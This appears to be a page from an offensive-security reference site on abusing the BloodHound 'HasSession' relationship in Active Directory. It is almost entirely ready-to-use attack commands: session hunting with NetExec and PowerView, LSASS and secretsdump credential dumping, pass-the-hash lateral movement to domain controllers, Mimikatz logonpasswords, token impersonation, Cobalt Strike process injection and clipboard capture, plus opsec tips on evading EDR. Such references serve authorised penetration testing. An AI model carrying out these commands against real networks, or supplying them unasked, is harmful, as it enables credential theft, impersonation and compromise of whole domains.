🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / HasSession

HasSession

Target user has an active session on a computer where the source principal has local admin β€” harvest credentials or impersonate the target's token.

Applies to: Computer β†’ User (attacker controls Computer, target User has session there)

Linux Abuse

Step 1: Identify sessions (BloodHound / NetExec)

# Find where target user has sessions
netexec smb <subnet>/24 -u <username> -p '<password>' -d <domain> --sessions

# BloodHound query already identifies the computer β€” proceed directly

Step 2: Dump credentials from target session

# Full credential dump from remote machine (requires local admin)
secretsdump.py '<domain>/<username>:<password>@<session-computer>'
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<username>@<session-computer>'

# Target specific user's hashes via LSASS modules
netexec smb <session-computer> -u <username> -p '<password>' -d <domain> -M lsassy
netexec smb <session-computer> -u <username> -H '<ntlm-hash>' -d <domain> -M nanodump
netexec smb <session-computer> -u <username> -p '<password>' -d <domain> -M procdump

Step 3: Use recovered hash for lateral movement

# Authenticate as target user
wmiexec.py -hashes ':<target-ntlm-hash>' '<domain>/<target-user>@<target-host>'
evil-winrm -i <dc-ip> -u <target-user> -H '<target-ntlm-hash>'
secretsdump.py -hashes ':<target-ntlm-hash>' '<domain>/<target-user>@<dc-ip>' -just-dc-ntlm

Windows Abuse

Find target sessions (PowerView)

# Find where high-value users have sessions
Find-DomainUserLocation -UserIdentity <target-user>
Invoke-UserHunter -UserName <target-user>

Token impersonation (Invoke-TokenManipulation)

# List available tokens on current system
Invoke-TokenManipulation -Enumerate

# Impersonate target user token
Invoke-TokenManipulation -ImpersonateUser -Username '<domain>\<target-user>'

# Create process with target token
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username '<domain>\<target-user>'

Credential dump on session host (Mimikatz)

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest

Process injection into target user's process

# Identify target user's processes
Get-Process -IncludeUserName | Where-Object { $_.UserName -like '*<target-user>*' }

# Inject via Cobalt Strike
inject <PID> x64 <listener>

Keylogging / clipboard capture

# PowerSploit clipboard monitor
Invoke-ClipboardMonitor -CollectionLimit 10

Opsec

  • LSASS access detected by EDR (Event ID 4656/10 Sysmon); nanodump/indirect syscall variants evade some hooks
  • sekurlsa::logonpasswords requires SeDebugPrivilege β€” triggers UAC/integrity checks if not already elevated
  • Token impersonation (T1134) β€” detectable via Event ID 4624 logon type 9 (NewCredentials)
  • Session hunting (Invoke-UserHunter) performs SMB enumeration β€” noisy on the wire; use -CheckAccess to limit scope
  • Users frequently reuse sessions on the same workstation β€” high probability of success on repeat attempts